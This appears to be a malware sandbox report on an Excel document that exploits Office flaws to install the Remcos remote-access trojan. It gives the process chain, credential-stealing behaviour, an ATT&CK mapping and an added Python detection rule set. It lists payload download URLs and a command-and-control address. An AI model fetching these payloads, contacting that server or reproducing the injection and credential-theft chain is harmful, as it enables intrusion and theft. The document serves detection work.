                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-4CT19T
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe14_2_0040569A
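The process relationships the report records are the most durable host-side detection material on this page: wscript.exe spawns powershell.exe, that PowerShell spawns a second, hidden, policy-bypassing PowerShell, which launches RegAsm.exe with no arguments (a signed .NET utility that has nothing to register, so it is only useful as an injection host), and the injected RegAsm.exe then spawns further RegAsm.exe children with `/stext "<temp file>"`, the switch Remcos uses when it drives its bundled credential-recovery tools to write results to disk. The rule set below is an added example, not part of the Joe Sandbox report; it encodes those four relationships and runs them over a constructed event list modelled on the "Process created" lines above. PIDs are invented, the wscript.exe command line and the full PowerShell bodies are not reproduced, and the explorer.exe and `/codebase` events are benign noise added to show what the rules do not fire on.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed events (made-up PIDs) modelled on the report's "Process created" lines.
EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, r"C:\Windows\SysWOW64\wscript.exe", "wscript.exe"),
    ProcEvent(200, 100, POWERSHELL,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = ...'),
    ProcEvent(300, 200, POWERSHELL,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden '
              r'-executionpolicy bypass -NoProfile -command "$imageUrl = ..."'),
    ProcEvent(400, 300, REGASM, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(500, 400, REGASM,
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"'),
    # Benign noise: a desktop session and a legitimate-looking RegAsm registration.
    ProcEvent(600, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(700, 600, REGASM, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /codebase C:\app\lib.dll'),
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _args_of(cmdline: str) -> str:
    """Drop the image-path token (quoted or bare) and return the remaining arguments."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        close = cmdline.find('"', 1)
        return cmdline[close + 1:].strip() if close > 0 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def find_alerts(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Apply the four parent/child rules; returns (pid, reason) in event order."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    alerts: List[Tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = _basename(e.image)
        pname = _basename(parent.image) if parent else ""
        args = _args_of(e.cmdline).lower()
        if name == "powershell.exe" and pname in ("wscript.exe", "cscript.exe"):
            alerts.append((e.pid, "script host spawned PowerShell"))
        if name == "powershell.exe" and "-executionpolicy bypass" in args and "-windowstyle hidden" in args:
            alerts.append((e.pid, "hidden PowerShell with execution policy bypass"))
        if name == "regasm.exe" and pname == "powershell.exe" and args == "":
            alerts.append((e.pid, "argument-less RegAsm.exe launched by PowerShell (injection host)"))
        if name == "regasm.exe" and pname == "regasm.exe" and "/stext" in args:
            alerts.append((e.pid, "RegAsm.exe spawned RegAsm.exe /stext (Remcos credential recovery)"))
    return alerts


def render_chain(events: List[ProcEvent], pid: int) -> str:
    """Walk ppid links upward and print the ancestry as 'root > ... > pid'."""
    by_pid = {e.pid: e for e in events}
    names = []
    while pid in by_pid:
        names.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(names))


if __name__ == "__main__":
    for pid, why in find_alerts(EVENTS):
        print(f"pid {pid}: {why}  [{render_chain(EVENTS, pid)}]")
```

The mutex `Rmc-4CT19T` recorded above is another usable indicator (the `Rmc-` prefix), but mutex creation is a different event type and is left out of this process-tree rule set.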
                  ATT&CK matrix (the report's flattened table, regrouped by tactic column; the digit prefixes are kept exactly as the report renders them):
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                  Resource Development: 121 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: 11 Native API; 43 Exploitation for Client Execution; 123 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                  Persistence: 121 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 422 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Defense Evasion: 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 422 Process Injection; HTML Smuggling
                  Credential Access: 2 OS Credential Dumping; 111 Input Capture; 2 Credentials in Registry; 3 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 4 File and Directory Discovery; 38 System Information Discovery; 3 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                  Collection: 11 Archive Collected Data; 1 Data from Local System; 2 Email Collection; 111 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Command and Control: 15 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1500777
Sample: SecuriteInfo.com.MSExcel.CV...
Startdate: 28/08/2024
Architecture: WINDOWS
Score: 100

Start node 2:
• 63 zhort.de (2->63)
• 85 Suricata IDS alerts for network traffic (2->85)
• 87 Found malware configuration (2->87)
• 89 Malicious sample detected (through community Yara rule) (2->89)
• 91 21 other signatures (2->91)
• 11 EXCEL.EXE 33 31 (2->11, started)

Node 11 EXCEL.EXE:
• 67 zhort.de 88.99.66.38, 443, 49161, 49163 HETZNER-ASDE Germany (11->67)
• 69 198.12.81.228, 49162, 49169, 49170 AS-COLOCROSSINGUS United States (11->69)
• 55 ~$SecuriteInfo.com...oit.16063.8851.xlsx, data (11->55, dropped)
• 57 sreemanganshekumar...otheroadwith[1].doc, Rich (11->57, dropped)
• 15 wscript.exe 1 (11->15, started)
• 18 WINWORD.EXE 348 33 (11->18, started)

Node 15 wscript.exe:
• 113 Suspicious powershell command line found (15->113)
• 115 Wscript starts Powershell (via cmd or directly) (15->115)
• 117 Very long command line found (15->117)
• 125 3 other signatures (15->125)
• 22 powershell.exe 4 (15->22, started)

Node 18 WINWORD.EXE:
• 65 zhort.de (18->65)
• 45 C:\Users\user\AppData\...\zhort.de.url, MS (18->45, dropped)
• 47 C:\Users\user\AppData\Roaming\...\UlEYs1.url, MS (18->47, dropped)
• 49 ~WRF{5CA061CB-7A8F...F-239624BEF21A}.tmp, Composite (18->49, dropped)
• 51 C:\Users\user\AppData\Local\...\F9C7AC5D.doc, Rich (18->51, dropped)
• 119 Microsoft Office launches external ms-search protocol handler (WebDAV) (18->119)
• 121 Office viewer loads remote template (18->121)
• 123 Microsoft Office drops suspicious files (18->123)
• 25 EQNEDT32.EXE 12 (18->25, started)

Node 22 powershell.exe:
• 93 Suspicious powershell command line found (22->93)
• 95 Suspicious execution chain found (22->95)
• 28 powershell.exe 12 5 (22->28, started)

Node 25 EQNEDT32.EXE:
• 53 C:\...\creatednewimagesinpicturebuttersmo.vBS, Unicode (25->53, dropped)
• 97 Office equation editor establishes network connection (25->97)
• 99 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) (25->99)

Node 28 powershell.exe:
• 71 ia803104.us.archive.org 207.241.232.154, 443, 49171 INTERNET-ARCHIVEUS United States (28->71)
• 109 Writes to foreign memory regions (28->109)
• 111 Injects a PE file into a foreign processes (28->111)
• 32 RegAsm.exe 3 10 (28->32, started)
• 36 RegAsm.exe (28->36, started)

Node 32 RegAsm.exe:
• 59 192.3.101.172, 2404, 49173, 49174 AS-COLOCROSSINGUS United States (32->59)
• 61 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands (32->61)
• 73 Detected Remcos RAT (32->73)
• 75 Maps a DLL or memory area into another process (32->75)
• 38 RegAsm.exe 1 (32->38, started)
• 41 RegAsm.exe 1 (32->41, started)
• 43 RegAsm.exe 11 (32->43, started)

Node 36 RegAsm.exe:
• 77 Contains functionality to bypass UAC (CMSTPLUA) (36->77)
• 79 Tries to steal Mail credentials (via file registry) (36->79)
• 81 Contains functionality to steal Chrome passwords or cookies (36->81)
• 83 4 other signatures (36->83)

Node 38 RegAsm.exe:
• 101 Tries to steal Instant Messenger accounts or passwords (38->101)
• 103 Tries to steal Mail credentials (via file / registry access) (38->103)
• 105 Searches for Windows Mail specific files (38->105)

Node 41 RegAsm.exe:
• 107 Tries to harvest and steal browser information (history, passwords, etc) (41->107)

Source | Detection | Scanner | Label
SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | 18% | ReversingLabs |
SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://b.scorecardresearch.com/beacon.js | 0% | URL Reputation | safe
http://acdn.adnxs.com/ast/ast.js | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | URL Reputation | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | 0% | URL Reputation | safe
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | URL Reputation | safe
http://cache.btrll.com/default/Pix-1x1.gif | 0% | URL Reputation | safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://o.aolcdn.com/ads/adswrappermsni.js | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://static.chartbeat.com/js/chartbeat.js | 0% | URL Reputation | safe
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | 100% | URL Reputation | malware
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | 0% | URL Reputation | safe
https://login.yahoo.com/config/login | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | 0% | URL Reputation | safe
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | 0% | URL Reputation | safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | 0% | URL Reputation | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://www.ccleaner.com/go/app_cc_pro_trialkey | 0% | URL Reputation | safe
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
https://contextual.media.net/8/nrrV73987.js | 0% | URL Reputation | safe
http://www.imvu.com | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contextual.media.net/ | 0% | URL Reputation | safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | 0% | URL Reputation | safe
https://ia803104.us.archive.org | 0% | Avira URL Cloud | safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | 0% | URL Reputation | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | 0% | URL Reputation | safe
http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://cdn.at.atwola.com/_media/uac/msn.html | 0% | URL Reputation | safe
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIF | 0% | Avira URL Cloud | safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://policies.yahoo.com/w3c/p3p.xml | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://www.msn.com/?ocid=iehp | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Avira URL Cloud | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Avira URL Cloud | safe
https://zhort.de/UlEYs1 | 0% | Avira URL Cloud | safe
http://www.nirsoft.net0 | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
https://ia803104.us.archive.org/27/items/vbs_20240LR | 0% | Avira URL Cloud | safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Avira URL Cloud | safe
http://198.12.81.228 | 0% | Avira URL Cloud | safe
http://www.imvu.com/NK | 0% | Avira URL Cloud | safe
http://198.12.81.228/600/RGGV.txt | 0% | Avira URL Cloud | safe
http://www.msn.com/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
192.3.101.172 | 0% | Avira URL Cloud | safe
https://zhort.de/UlEYs1f | 0% | Avira URL Cloud | safe
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFj | 0% | Avira URL Cloud | safe
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFc | 0% | Avira URL Cloud | safe
https://zhort.de/UlEYs1yX | 0% | Avira URL Cloud | safe
https://zhort.de/ | 0% | Avira URL Cloud | safe
http://www.msn.com/advertisement.ad.js | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zhort.de | 88.99.66.38 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
ia803104.us.archive.org | 207.241.232.154 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc | true | Avira URL Cloud: safe | unknown
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIF | true | Avira URL Cloud: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | true | URL Reputation: malware | unknown
https://zhort.de/UlEYs1 | false | Avira URL Cloud: safe | unknown
http://198.12.81.228/600/RGGV.txt | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
192.3.101.172 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://b.scorecardresearch.com/beacon.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://acdn.adnxs.com/ast/ast.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.comr | RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://ia803104.us.archive.org | powershell.exe, 0000000C.00000002.438679378.0000000002359000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | RegAsm.exe, 0000000F.00000002.448125301.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://www.google.com | RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://o.aolcdn.com/ads/adswrappermsni.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.msn.com/?ocid=iehp | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
http://static.chartbeat.com/js/chartbeat.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.msn.com/de-de/?ocid=iehp | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://login.yahoo.com/config/login | RegAsm.exe | false | URL Reputation: safe | unknown
http://www.nirsoft.net0 | RegAsm.exe, 0000000F.00000002.447784397.0000000000154000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.443131890.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.438679378.0000000002221000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240LR | powershell.exe, 0000000A.00000002.443131890.00000000024C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
